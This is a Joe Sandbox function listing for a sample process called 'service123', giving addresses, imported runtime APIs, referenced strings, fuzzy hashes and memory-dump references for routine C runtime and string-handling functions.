Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 9e089e6cd6cd64aa5b62a2a55d0ff6e4215562d1fbf434e16bed1c0db5fcfaf7
Instruction ID: 27d5f1bdc7f3ee2c53e6f5795182ac77ddaf03e739a0fbc8e3b70157b257deb5
Opcode Fuzzy Hash: 9e089e6cd6cd64aa5b62a2a55d0ff6e4215562d1fbf434e16bed1c0db5fcfaf7
Instruction Fuzzy Hash: 0FE04F7048821E8ACB10DF28C061599B7959A5E348FC0480AECD9B6D19D730DA8BCE82

Function 6C2F9249 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 31libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 6C2F9260
GetProcAddress.KERNEL32 ref: 6C2F927A
LoadLibraryW.KERNEL32 ref: 6C2F929F
GetProcAddress.KERNEL32 ref: 6C2F92B3

Strings

advapi32.dll, xrefs: 6C2F9298
SystemFunction036, xrefs: 6C2F92A8
rand_s, xrefs: 6C2F926F
msvcrt.dll, xrefs: 6C2F9255

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: AddressProc$HandleLibraryLoadModule
String ID: SystemFunction036$advapi32.dll$msvcrt.dll$rand_s
API String ID: 384173800-4041758303
Opcode ID: eafefa3bd23e1492917885e1c993f20fb5b91d7554e6e1e444b5158e3c33fdee
Instruction ID: 36fe034be4612a8eacd54ec6f42b21ff155e6d9ad56d14a7d8938d4e6f549542
Opcode Fuzzy Hash: eafefa3bd23e1492917885e1c993f20fb5b91d7554e6e1e444b5158e3c33fdee
Instruction Fuzzy Hash: 08F04FB5A942148BCB00FF78864625EBFB0BB55320F01092DD8D997214D3349864CF67

Function 6C37F670 Relevance: 13.7, APIs: 8, Strings: 1, Instructions: 224COMMON

Download Yara Rule

APIs

memmove.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C35D7DE), ref: 6C37F70D
memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C35D7DE), ref: 6C37F738
memmove.MSVCRT ref: 6C37F787
memmove.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C35D7DE), ref: 6C37F7BD
memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C35D7DE), ref: 6C37F808

Strings

basic_string::_M_replace, xrefs: 6C37F966

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: memmove$memcpy
String ID: basic_string::_M_replace
API String ID: 3033661859-2323331477
Opcode ID: 0d68d28fee1da1c24fa9298d746b529622d73fd094996b93f591944b4b400e7c
Instruction ID: 093dffa2853fda4df1254357a191fab2129ca9e3c723e1dcc9a906ebdcc85ad2
Opcode Fuzzy Hash: 0d68d28fee1da1c24fa9298d746b529622d73fd094996b93f591944b4b400e7c
Instruction Fuzzy Hash: 4B814774A093959FC321DF28C08051ABBE5BFCA648F24895EE4E487715D33AD849CF67

Function 6C2EFEE0 Relevance: 13.7, APIs: 9, Instructions: 186synchronizationCOMMON

Download Yara Rule

APIs

CreateSemaphoreW.KERNEL32 ref: 6C2F00D2
WaitForSingleObject.KERNEL32 ref: 6C2F0117

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: CreateObjectSemaphoreSingleWait
String ID:
API String ID: 1168595426-0
Opcode ID: a9b030a5831e50a6e37e3fcc428173814d314c5695862d65f2f1bb88068accce
Instruction ID: b2b1b508ca9a1afb2196e4e21c9f8fdfbffdae34c783f5b2c8c10e9fe12b4cbf
Opcode Fuzzy Hash: a9b030a5831e50a6e37e3fcc428173814d314c5695862d65f2f1bb88068accce
Instruction Fuzzy Hash: 37619C3078934ECFDB10EF69D540757B7F4AB4A309F40862DEC6897A80DB74D84A8B62

Function 6C2EE760 Relevance: 13.6, APIs: 9, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06e0c648a8d817803f94ec4fed503a03ca8cf05461f9862a5274ef0ffe4ad900
Instruction ID: 2834592cdf3db8db99eaf4d2f014d71071a6bf1f81676af52336d6909c78ea96
Opcode Fuzzy Hash: 06e0c648a8d817803f94ec4fed503a03ca8cf05461f9862a5274ef0ffe4ad900
Instruction Fuzzy Hash: A401E570A1821E8FC700DA19C480A9AF7E5AB9D314F814D29FC85A7B19D230D8CAC7C2

Function 6C2F32C0 Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 407COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 6C2F3391

Strings

0, xrefs: 6C2F380E
o, xrefs: 6C2F3778

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: memset
String ID: 0$o
API String ID: 2221118986-4157579757
Opcode ID: 00cb2d98c6e32ca29e5df2379417918a183b51e8976e900d5a5783c2af379635
Instruction ID: 2a8b9d0032b7d215ff1ddc76958d916cb1a6daa1fe2d72c0080b52ec1964dfef
Opcode Fuzzy Hash: 00cb2d98c6e32ca29e5df2379417918a183b51e8976e900d5a5783c2af379635
Instruction Fuzzy Hash: 54F18E71A4420D8FCB01CF68C48069DFBF2BF89364F198229EC64AB791D734E946CB91

Function 002D2BF0 Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 407COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 002D2CC1

Strings

0, xrefs: 002D313E
o, xrefs: 002D30A8

Memory Dump Source

Source File: 00000006.00000002.4154326212.00000000002D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000006.00000002.4154283382.00000000002D0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.4154347821.00000000002DA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.4154373639.00000000002DE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.4154403325.00000000002E1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d0000_service123.jbxd

Similarity

API ID: memset
String ID: 0$o
API String ID: 2221118986-4157579757
Opcode ID: 5a2ef28bdbcba101e83cdabdda6d05f5f0490c8583f277cf0ba504eb215e70c5
Instruction ID: 4b1e2e10d02cf81440b723e6980a25a8363732fdd961cc5f9cce152e018f1b94
Opcode Fuzzy Hash: 5a2ef28bdbcba101e83cdabdda6d05f5f0490c8583f277cf0ba504eb215e70c5
Instruction Fuzzy Hash: CFF17F71A24209CFCB15CF68C48069DBBF2BF99360F19822AD854AB391D334ED59CF90

Function 6C2E13E0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 43libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 6C2E13F0
LoadLibraryA.KERNEL32 ref: 6C2E1406
GetProcAddress.KERNEL32 ref: 6C2E1425
GetProcAddress.KERNEL32 ref: 6C2E1437

Strings

libgcc_s_dw2-1.dll, xrefs: 6C2E13E9, 6C2E13FF
__deregister_frame_info, xrefs: 6C2E142C
__register_frame_info, xrefs: 6C2E141A

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: AddressProc$HandleLibraryLoadModule
String ID: __deregister_frame_info$__register_frame_info$libgcc_s_dw2-1.dll
API String ID: 384173800-1835852900
Opcode ID: 3bb2b41d1ca1c5f220f8562f7e0fa1288fdfbee38a6521c92a44a5f7a7d0f3be
Instruction ID: b8800bf71d8d3c654e29d7d313065c907377b6388c2075148d1cc556ad48c89d
Opcode Fuzzy Hash: 3bb2b41d1ca1c5f220f8562f7e0fa1288fdfbee38a6521c92a44a5f7a7d0f3be
Instruction Fuzzy Hash: 4101B5BAA092089BC700BF78A60615EBFB4AA89250F41493DD98467B11D730C444CBA3

Function 002D14E0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 43libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 002D14F0
LoadLibraryA.KERNEL32 ref: 002D1506
GetProcAddress.KERNEL32 ref: 002D1525
GetProcAddress.KERNEL32 ref: 002D1537

Strings

libgcc_s_dw2-1.dll, xrefs: 002D14E9, 002D14FF
__register_frame_info, xrefs: 002D151A
__deregister_frame_info, xrefs: 002D152C

Memory Dump Source

Source File: 00000006.00000002.4154326212.00000000002D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000006.00000002.4154283382.00000000002D0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.4154347821.00000000002DA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.4154373639.00000000002DE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.4154403325.00000000002E1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d0000_service123.jbxd

Similarity

API ID: AddressProc$HandleLibraryLoadModule
String ID: __deregister_frame_info$__register_frame_info$libgcc_s_dw2-1.dll
API String ID: 384173800-1835852900
Opcode ID: edeaca4030ee4e6c7cb804d1b411351baafcb7740719008641ca2be6bf196e18
Instruction ID: 7da1ce992c24bfc3bc2fc5f325ec4664cd6c5254cebe47069ae75c8715c3d0b6
Opcode Fuzzy Hash: edeaca4030ee4e6c7cb804d1b411351baafcb7740719008641ca2be6bf196e18
Instruction Fuzzy Hash: 8E011EB19252109BC7107FB8B94971D7FF4AB84751F42852BD5898B300E7748C648BA7

Function 6C307170 Relevance: 12.2, APIs: 6, Strings: 2, Instructions: 237stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 6C3071C1
strlen.MSVCRT ref: 6C3071DB
strlen.MSVCRT ref: 6C30722B
strlen.MSVCRT ref: 6C307288
strlen.MSVCRT ref: 6C3072DC

Strings

basic_string::append, xrefs: 6C30747A, 6C307486, 6C307492, 6C30749E
*, xrefs: 6C307410

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: strlen$strcmp
String ID: *$basic_string::append
API String ID: 551667898-3732199748
Opcode ID: 3d9861a14dc519e1d0d886380f505aac99951d407dc014eaa6e89d63eb5fb050
Instruction ID: 6da4292a5c31854fae3383c982b609582d565e020c8fd6162081c11c045433af
Opcode Fuzzy Hash: 3d9861a14dc519e1d0d886380f505aac99951d407dc014eaa6e89d63eb5fb050
Instruction Fuzzy Hash: BEA14C71A08601CFDB00EF28C18075EBBE1BF45318F51896DD898ABB55DB35E849CFA2

Function 6C383B80 Relevance: 12.2, APIs: 7, Strings: 1, Instructions: 233COMMON

Download Yara Rule

APIs

memmove.MSVCRT ref: 6C383C1F
memmove.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C31E77E), ref: 6C383C83
memmove.MSVCRT ref: 6C383CBB
memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C31E77E), ref: 6C383D2A

Strings

basic_string::_M_replace, xrefs: 6C383EAF

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: memmove$memcpy
String ID: basic_string::_M_replace
API String ID: 3033661859-2323331477
Opcode ID: b766452113ec9f1bcb8f7a131d9f8be354c2a395cf3a8626149d4dbab843a919
Instruction ID: 6e635135a8253ab8b298133ccd73c0ec27e6a5c11690997bfe3f808617167b41
Opcode Fuzzy Hash: b766452113ec9f1bcb8f7a131d9f8be354c2a395cf3a8626149d4dbab843a919
Instruction Fuzzy Hash: BB91133564A3558FC740EF28C08085AFBF1BF89748F50896DE8899B720E771E985CF92

Function 6C2EE800 Relevance: 12.1, APIs: 8, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 1884a794d3d441725b09e7e72905d71cc32fb0140713b8c23ce069bb11cd822c
Instruction ID: 5edc3975a8a5558d39104afbf41e57212a04cfe2063e9a148611301957e04b39
Opcode Fuzzy Hash: 1884a794d3d441725b09e7e72905d71cc32fb0140713b8c23ce069bb11cd822c
Instruction Fuzzy Hash: 1C21FF3155420ECFD714CE19C49198BB7A5AF9E315BD48A15EC9867E2CD330E88BCBD2

Function 002D1E70 Relevance: 12.1, APIs: 8, Instructions: 84COMMON

Download Yara Rule

APIs

signal.MSVCRT ref: 002D1EAF
signal.MSVCRT ref: 002D1EF6
signal.MSVCRT ref: 002D1F0F
signal.MSVCRT ref: 002D1F36
signal.MSVCRT ref: 002D1F72
signal.MSVCRT ref: 002D1FBF
signal.MSVCRT ref: 002D1FD5
signal.MSVCRT ref: 002D1FEB

Memory Dump Source

Source File: 00000006.00000002.4154326212.00000000002D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000006.00000002.4154283382.00000000002D0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.4154347821.00000000002DA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.4154373639.00000000002DE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.4154403325.00000000002E1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d0000_service123.jbxd

Similarity

API ID: signal
String ID:
API String ID: 1946981877-0
Opcode ID: ffa53f78872c2d712a15649bf2948ba8ac18adf585c8882cc692b4f85f420c74
Instruction ID: e0431535094e55ebfb045b32a3e600a8d01069ebea61c6df50b1619132cc68c2
Opcode Fuzzy Hash: ffa53f78872c2d712a15649bf2948ba8ac18adf585c8882cc692b4f85f420c74
Instruction Fuzzy Hash: 0F31DA70528302AEE7207FA5C94432E76E4AB45359F154D1BE8C486B91CBBD8CB89B53

Function 6C2F4A30 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 399COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 6C2F4A48

Strings

Inf, xrefs: 6C2F5505, 6C2F551D
@, xrefs: 6C2F4D17
NaN, xrefs: 6C2F540B

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: _errno
String ID: @$Inf$NaN
API String ID: 2918714741-141429178
Opcode ID: 90b007fa3bdc963b15e20a20d2b0e5c957ef96f1e998bbb1492b75ff1436b476
Instruction ID: 34991ce63b21184d8631ae89036cb949853c50c2d045a1530490a8dd6b617c4b
Opcode Fuzzy Hash: 90b007fa3bdc963b15e20a20d2b0e5c957ef96f1e998bbb1492b75ff1436b476
Instruction Fuzzy Hash: 8DF1CF7168C38E8BD7218F28C55079BFBE1BB85319F158A2DECEC87781D77499068B42

Function 002D4360 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 399COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 002D4378

Strings

@, xrefs: 002D4647
Inf, xrefs: 002D4E35, 002D4E4D
NaN, xrefs: 002D4D3B

Memory Dump Source

Source File: 00000006.00000002.4154326212.00000000002D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000006.00000002.4154283382.00000000002D0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.4154347821.00000000002DA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.4154373639.00000000002DE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.4154403325.00000000002E1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d0000_service123.jbxd

Similarity

API ID: _errno
String ID: @$Inf$NaN
API String ID: 2918714741-141429178
Opcode ID: 2a1cce2f34fef3df4d68579e48c572f7cd9accfed6687d5cb4134b2dace50250
Instruction ID: b079b9e6bff044f9a4125841244521756deaa959c94d045ffc95012bb40cf0bd
Opcode Fuzzy Hash: 2a1cce2f34fef3df4d68579e48c572f7cd9accfed6687d5cb4134b2dace50250
Instruction Fuzzy Hash: DBF1C17162C3828BD730AF24D0907ABBBE2BB85314F148A1FE9DD87381D7759D558B42

Function 6C2F3830 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 295COMMON

Download Yara Rule

Strings

@, xrefs: 6C2F3AFA
0, xrefs: 6C2F3B96

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID:
String ID: 0$@
API String ID: 0-1545510068
Opcode ID: 852fd2e7f322feda59a9287ec6fcafc659018383277beee50283a5623e34e20d
Instruction ID: 727e776a89c1ab7c48c04e9db7b21e6ed28ad278a3131c06dc043c64eada9a7a
Opcode Fuzzy Hash: 852fd2e7f322feda59a9287ec6fcafc659018383277beee50283a5623e34e20d
Instruction Fuzzy Hash: 54C16B71A5421E8BDB04CF69C48478DFBF1BF89354F288259EC64AB785D334E846CB91

Function 002D3160 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 295COMMON

Download Yara Rule

Strings

0, xrefs: 002D34C6
@, xrefs: 002D342A

Memory Dump Source

Source File: 00000006.00000002.4154326212.00000000002D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000006.00000002.4154283382.00000000002D0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.4154347821.00000000002DA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.4154373639.00000000002DE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.4154403325.00000000002E1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d0000_service123.jbxd

Similarity

API ID:
String ID: 0$@
API String ID: 0-1545510068
Opcode ID: e57f9d77be607eb7be2d65c7f691f863806e0b74bc638be5844c6890f5152d77
Instruction ID: 2db9ee81e98ddc43afe7039554288b5dbd4727e02b7184fcbc0dcf31ccd40c35
Opcode Fuzzy Hash: e57f9d77be607eb7be2d65c7f691f863806e0b74bc638be5844c6890f5152d77
Instruction Fuzzy Hash: 14C19971E202168BDB15CF68C58479DBBF1BF88310F28825AEC58AB389D774ED11CB91

Function 6C30B5C0 Relevance: 10.7, APIs: 5, Strings: 2, Instructions: 212stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C30B5E6
memcmp.MSVCRT ref: 6C30B60A
memcmp.MSVCRT ref: 6C30B67D
memcmp.MSVCRT ref: 6C30B6EF

Part of subcall function 6C3AAB60: strlen.MSVCRT ref: 6C3AAB6E

memcmp.MSVCRT ref: 6C30B787

Strings

basic_string::compare, xrefs: 6C30B629, 6C30B69A, 6C30B70D, 6C30B7A6, 6C30B7C2
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 6C30B631, 6C30B6A2, 6C30B715, 6C30B7AE, 6C30B7CA

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: memcmp$strlen
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::compare
API String ID: 3738950036-1697194757
Opcode ID: 6f9b4bb458c811cec1241aa999d3a3c93fd339e6b493666848afa1066dc8b7fb
Instruction ID: 0f4833a407c75fe2793052e8e938aae10d1b09cc9adb280a8ef40c4fd638b557
Opcode Fuzzy Hash: 6f9b4bb458c811cec1241aa999d3a3c93fd339e6b493666848afa1066dc8b7fb
Instruction Fuzzy Hash: BF6144B670A3559FC304AF29C98085EBBE5BF88648F15892DE8C887710E631DC85CF97

Function 6C3074C0 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 211stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C3530D0: memset.MSVCRT ref: 6C353115

strcmp.MSVCRT ref: 6C307521
strlen.MSVCRT ref: 6C30753C
strlen.MSVCRT ref: 6C307583
strlen.MSVCRT ref: 6C3075F4
strlen.MSVCRT ref: 6C307662

Strings

*, xrefs: 6C307740

Memory Dump Source

